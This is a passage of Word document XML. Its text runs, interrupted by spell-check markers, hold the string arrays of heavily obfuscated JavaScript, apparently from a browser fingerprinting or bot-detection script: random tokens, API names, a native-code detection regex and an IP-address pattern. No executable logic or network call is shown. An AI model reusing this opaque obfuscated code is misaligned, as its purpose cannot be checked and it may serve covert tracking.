        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-",&gt;&gt;var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "bDKbeclZUqkceQ","d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GFipKNlrFIRvEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ceil", "CSS", "yctLije8gC3H", "B0rqAbwNJ_dDEcvN7B93_rEWBH8e", "2L4ThUzJ5XSYpiU", "ZX2nFcJwMA", "action", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SyaMZtVyDfQBdKQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HlLeH_Q2", "Kesnoz3g8k3FpQQ9","6_c", "pd4LuWvKhxTEpgc", "7iTRE6xxBddfOOOu", "sPVR6SOgknGhgA", "7fg", "fjzya_01MJkRa9X_", "Int32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SBDtRKMSRNNSeOzDxg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasOwnProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mL8sh03E4062lCwuK4rfFn3IquGvG4I", "1S65F9FBaQ", "vD_2KJkhD8sLZpe-", "cn7sYIQkQsdUE5iavg", "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]--", "jyPZSaocE_E-UuH_yiNHybI0d0dBz1H6Kpb7kDg4qiM", "KzafEuBXFq4nb-2vhRVR9u8n", "q-QFx0TO", "9PJTujPk", "TiyaKZ0qb-JlGa674g", "EDW9TpxKAeNaAA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "443", "get", "lbECiFqZ3QXQwWIoCte6PTik", "F8Iewk7TszvT60QgEvXPLH0", "Z9kj5kTq7xbfiRpXeLajSxOUrPfXLPhzsGArHMS8eb5ZNL3Q0Nvmuno", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"GEKcTPV2Ho9uaQ", "7QjtEqwGNPo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toLowerCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "from-page-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1zC6WOVFM7EXQ5ee", "qTbXbbYySOlDSOfRvA9wheY5UgoyzR7U", "YsECpHeT6g", "r4A06ln17zW-gh9L", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifsoiEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "oiD5csQFBKo", "WjKUUeRILKY3daLp0CIO4qEOZkpvxEe8Ytes-1Vl71iezicXV3wYHI4upiCN58XFHhS1NB2Ub-u8eraLDtVmdw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTzSeKY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HWvxH6k4EOVVSw", "KzO6RvxXZakpNb2_qXx4xP1ceA", "CIJ1mwLd11SxlWsOKQ", "Document", "5sNu5gKywHLo6mYxd9SOOGXv77fTL6wl8A", "CIJPyT6_ow", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FCS7RfF2c_kf", "ydBfsSq1g2ropXoiUsSAMFGijceIIuQ4mwcKR43MIelCWcGUwduUinyXAP4oXw0srpEyj_JcnUE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vvoNn3Lg1w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8Tu-fo9KCZ0JTsqzijB925AvNjxIu0yBStPJiGE2", "URL", "EZI04A7a","sIhhvwbV", "Error", "sFKNAMlIXLlDMLa4mQ", "HKgD1Q793GGJtmISLKmFKwjl98w", "Mt1NqAylvXU", "assign", "S5UH62HIwQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JcoYhgqgzHjzmzM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Hel$&amp;?6%){</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+#@\uD83D\uDC7A", "OYZu-Cu5qg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClPgFbEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZkT6R70vKd5eTenxyx0237QMeBRjzVPKL7_d-QE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcsY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFfNDqAdDrFmb_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Object", "feVuiimeuXe43Q", "G1HsVIQgJ_5A", "\u26CE", "NjvUYKlMOf1vaevY32h07_oGGEhGuWu5c9H07H9MrCLv5iU", "sQKXP4lK", "multipart\x2Fform-data", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "document", "U8565RL880jOgEddOf6oEgaBvPqxKowUkGFSNLDuCJY0fJqumYri6iKJCdJ6ADMe8b5c7LQ68BgNmg", "M5Vs2RKP7GSzx0NhF-A", "5RWXS-l3XPcQI5nBkCc", "gdlV1zqIw2Hrq2RmGg", "([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})", "parse", "\uD800\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDFFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
